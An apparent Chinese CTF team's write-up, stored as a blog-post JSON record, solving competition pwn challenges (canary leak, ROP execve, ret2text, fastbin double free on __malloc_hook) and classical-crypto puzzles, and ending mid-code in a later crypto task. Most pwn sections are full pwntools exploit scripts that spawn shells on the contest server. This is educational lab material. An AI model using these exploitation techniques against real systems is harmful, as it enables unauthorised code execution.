{"id":3594,"date":"2026-04-19T16:58:20","date_gmt":"2026-04-19T08:58:20","guid":{"rendered":"https:\/\/www.sanjiuctf.com\/?p=3594"},"modified":"2026-04-19T16:58:21","modified_gmt":"2026-04-19T08:58:21","slug":"%e9%a6%96%e5%b1%8a%e4%ba%91%e6%9e%a2%e6%9d%afctfhw%e6%8c%91%e6%88%98%e8%b5%9bwp","status":"publish","type":"post","link":"https:\/\/www.sanjiuctf.com\/?p=3594","title":{"rendered":"\u9996\u5c4a\u4e91\u67a2\u676fCTF&HW\u6311\u6218\u8d5bwp"},"content":{"rendered":"\n

\u524d\u8a00<\/h1>\n\n\n\n

\u961f\u4f0d\u540d\u5b57–\u5c0f\u6708<\/p>\n\n\n\n

\u9ad8\u6821\u8d5b\u9053-\u6392\u540d:4 \u89e3\u51fa23\u9053\u9898\u76ee \u4e00\u517125\u9053<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

Pwn<\/h1>\n\n\n\n

Canary\uff01<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u6808\u6ea2\u51fa Canary \u6cc4\u6f0f Ret2Text<\/p>\n\n\n\n

main\u51fd\u6570<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n
read(0, buf, 0x400u)\uff1abuf \u53ea\u6709 104 \u5b57\u8282 ([rbp-0x80])\uff0c\u5374\u80fd\u8bfb 0x400\uff0c\u6808\u6ea2\u51fa\u3002\nputs(buf)\uff1a\u524d\u9762\u6709\u4e2a\u968f\u673a\u6570\u6821\u9a8c if (v6 == atoi(buf))\uff0c\u968f\u4fbf\u8f93\u70b9\u5b57\u6bcd\u5fc5\u7136\u8d70\u8fdb else \u5206\u652f\u89e6\u53d1 puts\u3002\u7531\u4e8e read \u4e0d\u4f1a\u7ed9\u5b57\u7b26\u4e32\u672b\u5c3e\u8865 x00\uff0c\u6b63\u597d\u53ef\u4ee5\u5229\u7528\u8fd9\u4e2a puts \u628a\u76f8\u90bb\u5185\u5b58\u7684\u6570\u636e\u201c\u987a\u201d\u51fa\u6765\u3002<\/code><\/pre>\n\n\n\n
\u5229\u7528\u601d\u8def<\/p>\n\n\n\n
\u6cc4\u9732 Canary\nCanary \u5728 [rbp-0x18]\uff0c\u548c buf \u5dee\u4e86 104 \u4e2a\u5b57\u8282\u3002\n\u6784\u9020 104\u5b57\u8282\u5783\u573e\u6570\u636e + 1\u5b57\u8282\u8986\u76d6\u3002\u8fd9 1 \u5b57\u8282\u521a\u597d\u8986\u76d6\u6389 Canary \u6700\u4f4e\u4f4d\u7684 x00\u3002\u8fd9\u6837 puts \u6253\u5370\u7684\u65f6\u5019\u505c\u4e0d\u4e0b\u6765\uff0c\u4f1a\u987a\u5e26\u628a Canary \u5269\u4e0b\u7684 7 \u4e2a\u5b57\u8282\u5168\u6253\u51fa\u6765\u3002\u63a5\u6536\u540e\u8865\u4e0a x00 \u8fd8\u539f\u3002\n\n\u52ab\u6301\u8fd4\u56de\u5730\u5740 (Ret2Text)\n\u62ff\u5230 Canary \u540e\uff0c\u7a0b\u5e8f\u7d27\u63a5\u7740\u53c8\u7ed9\u4e86\u4e00\u6b21 read\u3002\n\u987a\u7740\u6808\u5f80\u4e0b\u8986\u76d6\uff1a104\u5b57\u8282\u5783\u573e\u6570\u636e -> \u521a\u521a\u6cc4\u9732\u7684Canary -> 24\u5b57\u8282\u5783\u573e\u6570\u636e (\u586b\u6ee1\u5230\u8fd4\u56de\u5730\u5740\u7684\u7a7a\u9699+\u8986\u76d6\u65e7RBP) -> ret\u6307\u4ee4(\u6808\u5bf9\u9f50) -> system(\"sh\")\u7684\u5730\u5740\u3002<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
from pwn import *\n\ncontext.arch = 'amd64'\ncontext.os = 'linux'\n\nhost = 'player.wdsec.com.cn'\nport = 32465\n\ndef exploit():\n    p = remote(host, port)\n\n    p.send(b\"A\" * 104 + b\"B\")\n    p.recvuntil(b\"A\" * 104 + b\"B\")\n\n    canary = u64(b\"x00\" + p.recv(7))\n    p.recvline()\n\n    payload = b\"A\" * 104\n    payload += p64(canary)\n    payload += b\"B\" * 24\n    payload += p64(0x401356)\n    payload += p64(0x4012F3)\n\n    p.send(payload)\n    p.interactive()\n\nif __name__ == '__main__':\n    exploit()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{e83b4059-abef-407a-9dfa-e6f481c602f8-785-55}<\/code><\/pre>\n\n\n\n
syscall?<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
main\u51fd\u6570<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u7a0b\u5e8f\u5728\u6808\u4e0a\u5206\u914d\u4e86\u5927\u5c0f\u4e3a 0x40 \u7684\u7f13\u51b2\u533a buf\uff0c\u4f46\u5728\u8c03\u7528 read(0, buf, 0x100u) \u65f6\u5141\u8bb8\u8bfb\u5165 0x100 \u5b57\u8282\u7684\u6570\u636e\uff0c\u5bfc\u81f4\u6808\u6ea2\u51fa\u3002\u8986\u76d6\u5230\u51fd\u6570\u8fd4\u56de\u5730\u5740\u7684\u504f\u79fb\u91cf\u4e3a 0x40 + 8 = 72 \u5b57\u8282\u3002<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u7a0b\u5e8f\u4e2d\u9884\u7559\u4e86\u6784\u5efa\u5b8c\u6574\u7cfb\u7edf\u8c03\u7528\u94fe\u7684 gadget \u51fd\u6570\uff08\u5730\u5740\uff1a0x401176\uff09\u4ee5\u53ca\u5168\u5c40\u53d8\u91cf\u533a\u7684 \/bin\/sh \u5b57\u7b26\u4e32\u3002\u76f4\u63a5\u901a\u8fc7\u6808\u6ea2\u51fa\u52ab\u6301\u63a7\u5236\u6d41\uff0c\u5229\u7528\u8fd9\u4e9b ROP chain \u6267\u884c execve(\"\/bin\/sh\", 0, 0)\u3002<\/code><\/pre>\n\n\n\n
\u5730\u5740\u6784\u9020\u4fe1\u606f<\/p>\n\n\n\n
\/bin\/sh \u5b57\u7b26\u4e32\u5730\u5740\uff1a0x404040\npop rax; ret \u5730\u5740\uff1a0x40117E\npop rdi; ret \u5730\u5740\uff1a0x401180\npop rsi; pop rdx; ret \u5730\u5740\uff1a0x401182\nsyscall \u5730\u5740\uff1a0x401185\n\u7cfb\u7edf\u8c03\u7528\u53f7 execve \u4e3a 59\u3002<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
from pwn import *\n\ncontext.arch = 'amd64'\ncontext.log_level = 'debug'\n\nio = remote('player.wdsec.com.cn', 31465)\n\npop_rax_ret = 0x40117E\npop_rdi_ret = 0x401180\npop_rsi_rdx_ret = 0x401182\nsyscall_ret = 0x401185\nbin_sh_addr = 0x404040\n\npayload = b'A' * 72\npayload += p64(pop_rax_ret)\npayload += p64(59)\npayload += p64(pop_rdi_ret)\npayload += p64(bin_sh_addr)\npayload += p64(pop_rsi_rdx_ret)\npayload += p64(0)\npayload += p64(0)\npayload += p64(syscall_ret)\n\nio.recvuntil(b\"Do u know syscall?n\")\nio.send(payload)\n\nio.interactive()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{f8ef38d4-91e5-424f-a7a0-26e9a9f739a4-785-56}<\/code><\/pre>\n\n\n\n
ret2text_pro<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u540e\u95e8\u51fd\u6570<\/p>\n\n\n\n
sub_4011B7<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
IDA \u4e2d\u80fd\u770b\u5230\u8fd9\u4e2a\u51fd\u6570\u91cc\u62fc\u4e86 \/bin\/sh \u7136\u540e\u76f4\u63a5\u8c03\u7528\u4e86 _system\n\u5229\u7528\u5730\u5740 (0x4011B8)\uff1a\u811a\u672c\u7684 payload \u6ca1\u7528\u51fd\u6570\u9996\u5730\u5740 0x4011B7 \uff0c\u800c\u662f\u6545\u610f\u5f80\u540e\u504f\u4e86 1 \u5b57\u8282\u6253\u5230\u4e86 0x4011B8 \u3002\u8fd9\u662f\u4e3a\u4e86\u8df3\u8fc7\u5f00\u5934\u7684 push rbp \u6307\u4ee4 \uff0c\u7ecf\u5178\u64cd\u4f5c\uff0c\u7528\u6765\u62c9\u5e73\u6808\u5e27\uff0c\u7ed5\u8fc7 64 \u4f4d glibc \u91cc system \u51fd\u6570\u7684 movaps 16\u5b57\u8282\u6808\u5bf9\u9f50\u68c0\u67e5\uff08\u4e0d\u7136\u76f4\u63a5\u62a5\u6bb5\u9519\u8bef\uff09\u3002<\/code><\/pre>\n\n\n\n
main\u51fd\u6570<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6ea2\u51fa\u70b9 (main)\uff1a\u6f0f\u6d1e\u5728 main \u51fd\u6570\u6700\u540e\u7684 read(0, buf, 0x30u) \u3002\u56e0\u4e3a\u53d8\u91cf buf \u79bb rbp \u7684\u8ddd\u79bb\u662f 0x20\uff0832\u5b57\u8282\uff09\uff0c\u518d\u52a0\u4e0a\u7528\u6765\u8986\u76d6 saved rbp \u7684 8 \u5b57\u8282\uff0c\u586b\u5165 40 \u4e2a\u5b57\u8282\u7684\u5783\u573e\u6570\u636e<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
from pwn import *\n\ncontext(os='linux', arch='amd64')\nio = remote('player.wdsec.com.cn', 32184)\n\npayload = b'a' * 40 + p64(0x4011B8)\n\nio.sendafter(b'please input:n', payload)\nio.interactive()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{7k3-m2a-9x4b5c6d8e}<\/code><\/pre>\n\n\n\n
heap<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5168\u5f00\uff0cGOT\u4e0d\u53ef\u5199\uff0c\u6808\u6709canary\uff0c\u53ea\u80fd\u8d70\u5806\u5229\u7528\u3002<\/p>\n\n\n\n
create<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5206\u914d\u4efb\u610f\u5927\u5c0f\u7684chunk\uff0c\u5b58\u5230\u5168\u5c40\u6570\u7ec4\u3002<\/p>\n\n\n\n
get<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u7528%s\u6253\u5370chunk\u5185\u5bb9\uff0c\u9047\u5230x00\u622a\u65ad\u3002\u8fd9\u91cc\u53ef\u4ee5\u6cc4\u9732libc\u5730\u5740\u3002<\/code><\/pre>\n\n\n\n
set<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5f80chunk\u5199\u6570\u636e\uff0c\u5199\u5165\u957f\u5ea6\u662f\u521b\u5efa\u65f6\u7684size\u3002<\/code><\/pre>\n\n\n\n
delete<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
free\u540e\u53ea\u6e05\u96f6g_used[i]\uff0c\u4f46g_ptrs[i]\u6307\u9488\u6ca1\u6e05\u7a7a\uff0c\u5b58\u5728UAF\u3002\u800c\u4e14\u6ca1\u6709\u68c0\u67e5double free\uff0c\u53ef\u4ee5\u5bf9\u540c\u4e00\u4e2achunk\u591a\u6b21free\u3002<\/code><\/pre>\n\n\n\n
\u6cc4\u9732libc<\/p>\n\n\n\n
\u5229\u7528unsorted bin\u7684fd\/bk\u6307\u9488\u6cc4\u9732main_arena\u5730\u5740\uff1a\ncreate(0x420) \u5206\u914d\u5927chunk\uff08idx 0\uff09\ncreate(0x18)\u5206\u914d\u5c0fchunk\u9632\u6b62\u5408\u5e76top chunk\uff08idx 1\uff09\ndelete(0) \u91ca\u653e\u5927chunk\u8fdbunsorted bin\ncreate(0x420) \u518d\u6b21\u5206\u914d\u540c\u6837\u5927\u5c0f\uff08idx 2\uff09\n\u6b64\u65f6idx 2\u7684chunk\u4eceunsorted bin\u53d6\u56de\uff0c\u7528\u6237\u6570\u636e\u533a\u524d16\u5b57\u8282\u6b8b\u7559\u7740\u539f\u6765\u7684fd\/bk\u6307\u9488\uff08\u6307\u5411main_arena+88\uff09\u3002\n\u7528get(2)\u8bfb\u53d6\uff0c\u62ff\u5230libc\u5730\u5740\uff1a<\/code><\/pre>\n\n\n\n
\u53d1\u73b0libc_base & 0xfff == 0\uff0c\u786e\u8ba4\u662fglibc 2.23\u3002<\/p>\n\n\n\n
fastbin double free<\/p>\n\n\n\n
glibc 2.23\u6ca1\u6709tcache\uff0cfastbin\u68c0\u67e5\u5f88\u5f31\uff0c\u53ef\u4ee5\u76f4\u63a5double free\uff1a<\/p>\n\n\n\n
create(0x60)  # idx 3\ncreate(0x60)  # idx 4\ndelete(3)\ndelete(4)\ndelete(3)     # double free<\/code><\/pre>\n\n\n\n
\u6b64\u65f6fastbin\u94fe\u8868\uff1achunk3 -> chunk4 -> chunk3\uff0c\u5f62\u6210\u5faa\u73af\u3002<\/p>\n\n\n\n
\u52ab\u6301__malloc_hook<\/p>\n\n\n\n
\u5229\u7528fastbin dup\u628achunk\u5206\u914d\u5230__malloc_hook\u9644\u8fd1\uff1a\ncreate(0x60)\u5206\u914didx 5\uff0c\u62ff\u5230chunk3\nset_note(5, p64(malloc_hook - 0x23))\u4fee\u6539chunk3\u7684fd\u6307\u5411fake chunk\ncreate(0x60)\u5206\u914didx 6\uff0c\u62ff\u5230chunk4\ncreate(0x60)\u5206\u914didx 7\uff0c\u62ff\u5230chunk3\uff08\u5faa\u73af\u56de\u6765\uff09\ncreate(0x60) \u5206\u914didx 8\uff0c\u62ff\u5230fake chunk\n\nfake chunk\u5730\u5740\u662fmalloc_hook - 0x23\uff0c\u8fd9\u4e2a\u4f4d\u7f6e\u524d\u9762\u6709\u4e2a0x7f\u5b57\u8282\u53ef\u4ee5\u4f2a\u9020size\u5b57\u6bb5\uff08\u5bf9\u5e94fastbin 0x70\uff09\u3002\nidx 8\u7684\u7528\u6237\u6570\u636e\u533a\u4ecemalloc_hook - 0x23 + 0x10\u5f00\u59cb\uff0c\u5230__malloc_hook\u7684\u504f\u79fb\u662f0x23 - 0x10 = 0x13\u3002\n\u5199\u5165payload\u8986\u76d6__malloc_hook\u4e3asystem\u5730\u5740\uff1a\nset_note(8, b'A' * 0x13 + p64(system))\n\ngetshell\n__malloc_hook\u88ab\u52ab\u6301\u540e\uff0c\u4e0b\u6b21\u8c03\u7528malloc\u4f1a\u8df3\u5230system\u3002\n\u8ba9system\u7684\u53c2\u6570\u6307\u5411\/bin\/sh\u5b57\u7b26\u4e32\u3002malloc\u7684\u53c2\u6570\u662fsize\uff0c\u4f1a\u4f5c\u4e3a\u7b2c\u4e00\u4e2a\u53c2\u6570\u4f20\u7ed9__malloc_hook\u3002\n\u6240\u4ee5\u76f4\u63a5malloc(bin_sh_addr)\u5c31\u7b49\u4ef7\u4e8esystem(bin_sh_addr)\uff1a<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
#!\/usr\/bin\/env python3\nfrom pwn import *\n\ncontext.arch = 'amd64'\ncontext.log_level = 'info'\n\np = remote('player.wdsec.com.cn', 30548)\n\ndef create(size):\n    p.sendlineafter(b\"# \", b\"1\")\n    p.sendlineafter(b\"size:n\", str(size).encode())\n\ndef get(idx):\n    p.sendlineafter(b\"# \", b\"2\")\n    p.sendlineafter(b\"idx:n\", str(idx).encode())\n    p.recvuntil(f\"g_ptrs[{idx}]: \".encode())\n    return p.recvline(drop=True)\n\ndef set_note(idx, content):\n    p.sendlineafter(b\"# \", b\"3\")\n    p.sendlineafter(b\"idx:n\", str(idx).encode())\n    p.sendafter(b\"str:n\", content)\n\ndef delete(idx):\n    p.sendlineafter(b\"# \", b\"4\")\n    p.sendlineafter(b\"idx:n\", str(idx).encode())\n\ncreate(0x420)\ncreate(0x18)\ndelete(0)\ncreate(0x420)\n\nleak = get(2)\nmain_arena_leak = u64(leak[:8].ljust(8, b'x00'))\nlibc_base = main_arena_leak - 0x3c4b78\nmalloc_hook = libc_base + 0x3c4b10\nsystem = libc_base + 0x453a0\nbin_sh = libc_base + 0x18ce57\n\nlog.success(f\"libc_base: {hex(libc_base)}\")\nlog.success(f\"system: {hex(system)}\")\n\ncreate(0x60)\ncreate(0x60)\ndelete(3)\ndelete(4)\ndelete(3)\n\ncreate(0x60)\nset_note(5, p64(malloc_hook - 0x23).ljust(0x60, b'x00'))\ncreate(0x60)\ncreate(0x60)\ncreate(0x60)\n\nset_note(8, b'A' * 0x13 + p64(system))\n\np.sendlineafter(b\"# \", b\"1\")\np.sendlineafter(b\"size:n\", str(bin_sh).encode())\n\np.sendline(b'cat \/flag*')\nprint(p.recv(timeout=3))\np.interactive()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{b0f65b4a-d38a-477a-b18b-c563f36c313e-785-57}<\/code><\/pre>\n\n\n\n
Crypto<\/h1>\n\n\n\n
\u6208\u9edb\u4e1d\u7684\u79d8\u5bc6<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5728\u4e00\u5ea7\u88ab\u9057\u5fd8\u7684\u56fe\u4e66\u9986\u6df1\u5904\uff0c\u63a2\u9669\u5bb6\u62c2\u53bb\u79ef\u5c18\uff0c\u53d1\u73b0\u4e86\u4e00\u5377\u7528\u4e9a\u9ebb\u7ef3\u6346\u624e\u7684\u53e4\u8001\u7f8a\u76ae\u5377\u8f74\u3002\u5377\u8f74\u8fb9\u7f18\u6cdb\u9ec4\u53d1\u8106\uff0c\u5374\u6e05\u6670\u7559\u5b58\u7740\u4e00\u4f4d\u4ee3\u53f7\u4e3a \u6208\u9edb\u4e1d\uff08Goddess\uff09 \u7684\u5973\u5bc6\u7801\u5e08\u7684\u5b57\u8ff9\uff0c\u5979\u5728\u5377\u9996\u5199\u4e0b\u4e00\u6bb5\u81ea\u8ff0\uff0c\u4f3c\u662f\u4e3a\u89e3\u5bc6\u8005\u7559\u4e0b\u7684\u6307\u5f15\uff1a\n\u201c\u6211\uff0c\u6208\u9edb\u4e1d\uff0c\u7528\u6211\u7684\u540d\u5b57\u4f5c\u4e3a\u94a5\u5319\uff0c\u5f00\u542f\u4e86\u5b88\u62a4\u79d8\u5bc6\u7684\u7b2c\u4e00\u9053\u95e8 \u2014\u2014 \u552f\u6709\u5b83\u80fd\u89e3\u5f00\u6700\u521d\u7684\u591a\u8868\u66ff\u6362\u4e4b\u9501\u3002\u4e3a\u4e86\u8ff7\u60d1\u5165\u4fb5\u8005\uff0c\u6211\u5c06\u6587\u5b57\u5982\u86c7\u822c\u7a7f\u68ad\u4e8e\u56db\u884c\u6805\u680f\u4e4b\u4e2d\uff0c\u8ba9\u5b57\u7b26\u7684\u987a\u5e8f\u85cf\u4e8e\u884c\u5217\u4ea4\u9519\u4e4b\u95f4\u3002\u63a5\u7740\uff0c\u6211\u8ba9\u6240\u6709\u5b57\u7b26\u7edf\u4e00\u5411\u524d\u8df3\u8dc3\u4e94\u6b65\uff0c\u4ee5\u6b64\u63a9\u76d6\u5b83\u4eec\u539f\u672c\u7684\u6a21\u6837\u3002\u4e3a\u4e86\u8ba9\u79d8\u5bc6\u66f4\u52a0\u7a33\u56fa\uff0c\u6211\u6c42\u52a9\u4e8e \u2018CRYPTO\u2019 \u4e4b\u6cd5\uff0c\u4ee5\u5b83\u4e3a\u6838\u5fc3\u6784\u5efa\u4e94\u4e58\u4e94\u7684\u5b57\u7b26\u65b9\u9635\uff0c\u5c06\u5b57\u6bcd\u4e24\u4e24\u914d\u5bf9\u66ff\u6362\uff0c\u8ba9\u6bcf\u4e00\u7ec4\u5b57\u7b26\u90fd\u9700\u4f9d\u6258\u65b9\u9635\u624d\u80fd\u8fd8\u539f\u3002\u968f\u540e\uff0c\u6211\u5c06\u6bcf\u4e00\u4e2a\u5b57\u6bcd\u5316\u4f5c\u4e94\u4e2a\u2018\u662f\u2019\u4e0e\u2018\u5426\u2019\u7684\u5224\u65ad\uff0c\u5e76\u7528\u20180\u2019\u4ee3\u8868\u2018\u662f\u2019\u3001\u20181\u2019\u4ee3\u8868\u2018\u5426\u2019\uff0c\u8ba9\u5b57\u6bcd\u85cf\u8fdb\u4e8c\u8fdb\u5236\u7684\u5e8f\u5217\u91cc\u3002\u6700\u540e\uff0c\u6211\u5c06\u8fd9\u4e32\u7531 0 \u548c 1 \u7ec4\u6210\u7684\u6570\u5b57\uff0c\u8f6c\u6362\u4e3a\u70b9\uff08\u30fb\uff09\u4e0e\u5212\uff08-\uff09\u7684\u4fe1\u53f7\uff0c\u8fd8\u7528\u659c\u6760\uff08\/\uff09\u5c06\u5b83\u4eec\u5206\u7ec4\uff0c\u4ee5\u4fbf\u7559\u5b58\u4e0e\u8fa8\u8ba4\u3002\u201d\n\u5377\u8f74\u7684\u672b\u5c3e\uff0c\u6ca1\u6709\u591a\u4f59\u6587\u5b57\uff0c\u53ea\u6709\u4e00\u884c\u7531\u70b9\u3001\u5212\u548c\u659c\u6760\u7ec4\u6210\u7684\u795e\u79d8\u7b26\u53f7\uff0c\u8fd9\u6b63\u662f\u6208\u9edb\u4e1d\u7528\u591a\u5c42\u52a0\u5bc6\u5b88\u62a4\u7684\u6700\u7ec8\u5bc6\u6587\uff1a\u30fb-\u30fb\u30fb-\/\u30fb\u30fb--\u30fb\/\u30fb--\u30fb\u30fb\/-\u30fb\u30fb\u30fb-\/\u30fb\u30fb\u30fb-\u30fb\/----\u30fb\/-\u30fb-\u30fb\u30fb\/\u30fb----\/--\u30fb--\/\u30fb-\u30fb-\u30fb\/-\u30fb--\u30fb\/\u30fb-\u30fb\u30fb\u30fb\/--\u30fb-\u30fb\/\u30fb--\u30fb-\/\u30fb\u30fb\u30fb--\/-\u30fb-\u30fb-\/\u30fb--\u30fb\u30fb\/-\u30fb\u30fb\u30fb-\/\u30fb\u30fb\u30fb-\u30fb\/----\u30fb\/-\u30fb-\u30fb\u30fb\/\u30fb----\/--\u30fb--\/\u30fb-\u30fb-\u30fb\/-\u30fb--\u30fb\/\u30fb-\u30fb\u30fb\u30fb--\u30fb-\u30fb\/\u30fb\u30fb\u30fb--\n\u636e\u56fe\u4e66\u9986\u6b8b\u5377\u8bb0\u8f7d\uff0c\u89e3\u5f00\u8fd9\u5c42\u5c42\u8c1c\u9898\u7684\u4eba\uff0c\u5c06\u83b7\u5f97\u4e00\u4efd\u4ee5flag{}\u683c\u5f0f\u5448\u73b0\u7684\u53e4\u8001\u667a\u6167 \u2014\u2014 \u5176\u4e2d\u85cf\u7740 \u201c\u53e4\u5178\u5bc6\u7801\u201d \u7684\u82f1\u6587\u7cbe\u9ad3\u3001\u201c\u5927\u5e08\u201d \u7684\u82f1\u6587\u79f0\u53f7\uff0c\u4ee5\u53ca\u4e00\u4e2a\u6807\u6ce8\u7740 \u201c2025\u201d \u7684\u672a\u6765\u5e74\u4efd\uff0c\u90a3\u4fbf\u662f\u6208\u9edb\u4e1d\u6bd5\u751f\u5b88\u62a4\u7684\u6838\u5fc3\u79d8\u5bc6\u3002<\/code><\/pre>\n\n\n\n
\u52a0\u5bc6<\/p>\n\n\n\n
\u660e\u6587 \u2192 Vigen\u00e8re\uff08\u5bc6\u94a5\uff1aGoddess\uff09 \u2192 \u6805\u680f\uff084\u680f\uff09 \u2192 \u51ef\u6492\uff08\u53f3\u79fb5\u4f4d\uff09 \u2192 Playfair\uff08\u5bc6\u94a5\uff1aCRYPTO\uff09 \u2192 5\u4f4d\u4e8c\u8fdb\u5236\uff08A=00000...\uff09 \u2192 \u6469\u65af\/\u81ea\u5b9a\u4e49\u7b26\u53f7\uff080=\u30fb, 1=-\uff09\u3002<\/code><\/pre>\n\n\n\n
\u9006\u5411\u5bf9\u5e94\u7684\u89e3\u5c31\u884c<\/p>\n\n\n\n
\u6469\u65af\u8f6c\u4e8c\u8fdb\u5236\uff1a\u5c06 \u30fb \u66ff\u6362\u4e3a 0\uff0c- \u66ff\u6362\u4e3a 1\uff0c\u6309 \/ \u5206\u7ec4\u3002\n\u4e8c\u8fdb\u5236\u8f6c\u5b57\u7b26\uff1a\u6bcf\u7ec45\u4f4d\u4e8c\u8fdb\u5236\u8f6c\u6362\u4e3a\u5341\u8fdb\u5236\uff0c\u52a0\u4e0a65\uff08ASCII\u7684'A'\uff09\u8fd8\u539f\u4e3a\u5b57\u6bcd\u3002\nPlayfair\u89e3\u5bc6\uff1a\u4ee5 CRYPTO \u4e3a\u5bc6\u94a5\u6784\u5efa5x5\u77e9\u9635\uff08I\/J\u540c\u6e90\uff09\uff0c\u5c06\u5b57\u6bcd\u4e24\u4e24\u5206\u7ec4\u9006\u5411\u89e3\u5bc6\u3002\n\u51ef\u6492\u89e3\u5bc6\uff1a\u5168\u90e8\u5b57\u6bcd\u5de6\u79fb5\u4f4d\u3002\n\u6805\u680f\u89e3\u5bc6\uff1a\u5c06\u5b57\u7b26\u4e32\u63094\u680f\u91cd\u6392\u8fd8\u539f\u3002\nVigen\u00e8re\u89e3\u5bc6\uff1a\u4ee5 GODDESS \u4e3a\u5bc6\u94a5\u8fdb\u884c\u591a\u8868\u66ff\u6362\u9006\u5411\u8fd0\u7b97\uff0c\u5f97\u6700\u7ec8\u660e\u6587\u3002<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
\u201c\u53e4\u5178\u5bc6\u7801\u201d\u7684\u82f1\u6587\uff1aClassical Cipher \uff08\u6216 Classical Cryptography\uff09\n\u201c\u5927\u5e08\u201d\u7684\u82f1\u6587\u79f0\u53f7\uff1aMaster\n\u6807\u6ce8\u7740\u672a\u6765\u7684\u5e74\u4efd\uff1a2025\n\u6309\u7167\u6807\u51c6\u7684 CTF \u683c\u5f0f\u5c06\u8fd9\u4e9b\u7ebf\u7d22\u7ec4\u5408\uff0c\u5e76\u4ee5\u4e0b\u5212\u7ebf\u6216\u9a7c\u5cf0\u547d\u540d\u6cd5\u8fde\u63a5\uff0c\u5373\u53ef\u5f97\u5230\u6700\u7ec8\u7684 flag\u3002<\/code><\/pre>\n\n\n\n
flag{Classical_Cipher_Master_2025}<\/code><\/pre>\n\n\n\n
easy_encode<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
[lyi[2r3XU[m[UKjLh1xLkf1MUSjLULuNFL0Ox1yXVSj[U@{L{P0NEe8<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
hint\u5047\u7684<\/p>\n\n\n\n
\u6ca1\u7528 random\uff0c\u76f4\u63a5\u76f2\u731c\u5df2\u77e5\u660e\u6587\u3002flag \u683c\u5f0f\u4e00\u822c\u662f flag{\uff0c\u628a\u5b83\u8f6c\u6210 base64 \u662f ZmxhZ3\u3002\n\u62ff base64 \u7684\u524d\u51e0\u4f4d\u548c\u5bc6\u6587 [lyi[2... \u5bf9\u6bd4\u4e00\u4e0b\uff1a\nZ (90) \u548c [ (91) \u5dee 1\nm (109) \u548c l (108) \u5dee 1\n\u5f02\u6216\u4e00\u4e0b\u53d1\u73b0\u5168\u90fd\u662f 1\u3002\n\u52a0\u5bc6\u903b\u8f91\uff1a\nflag \u8fdb\u884c Base64 \u7f16\u7801\uff0c\u5f97\u5230\u7684\u5b57\u7b26\u4e32\u9010\u5b57\u7b26\u8ddf\u6570\u5b57 1 \u8fdb\u884c\u5f02\u6216\u3002\n\u89e3\u5bc6\u903b\u8f91\uff1a\n\u5bc6\u6587\u9010\u5b57\u7b26\u8ddf\u6570\u5b57 1 \u5f02\u6216\u56de\u53bb\uff0c\u518d\u89e3\u4e00\u904d Base64\u3002<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
import base64\n\ncipher = \"[lyi[2r3XU[m[UKjLh1xLkf1MUSjLULuNFL0Ox1yXVSj[U@{L{P0NEe8\"\nb64_str = \"\".join([chr(ord(c) ^ 1) for c in cipher])\nflag = base64.b64decode(b64_str).decode()\nprint(flag)<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{6a6ee2d2-2284-4d13-8c57-1adde0334587}<\/code><\/pre>\n\n\n\n
\u5fd2\u4fee\u65af\u7684\u8ff7\u5bab<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
task.py<\/p>\n\n\n\n
import hashlib\n\nclass TheseusCipher:\n    def __init__(self, seed_word: str):\n        self.base = hashlib.md5(seed_word.encode()).digest()\n\n    def encrypt(self, msg: bytes) -> bytes:\n        # \u8ff7\u5bab\u7684\u5165\u53e3\u5c31\u662f\u51fa\u53e3\n        # \u521d\u59cb\u72b6\u6001\u7531\u95ef\u5165\u8005\u81ea\u8eab\u51b3\u5b9a\n        state = bytearray(16)\n        for i in range(16):\n            state[i] = self.base[i] ^ (msg[i] if i < len(msg) else 0)\n\n        out = bytearray()\n        for i, b in enumerate(msg):\n            # \u7ebf\u56e2\u7684\u7b2c\u4e00\u4e2a\u7ed3\u6307\u5f15\u65b9\u5411\n            keystream = (state[0] + state[7]) % 256\n            c = b ^ keystream\n            out.append(c)\n\n            # \u7f16\u7ec7\u65b0\u7684\u7ed3\uff1a\u7b2c\u4e09\u4e2a\u7ed3\u7684\u8bb0\u5fc6 + \u8d70\u8fc7\u7684\u8def + \u6b65\u6570\n            new_knot = (state[3] + c + i) % 256\n            state = state[1:] + bytes([new_knot])\n\n        return bytes(out)\n\n# \u963f\u91cc\u963f\u5fb7\u6d85\u7684\u4f4e\u8bed\nif __name__ == \"__main__\":\n    cipher = TheseusCipher(\"Ariadne\")\n    secret = b\"flag{...}\"  # 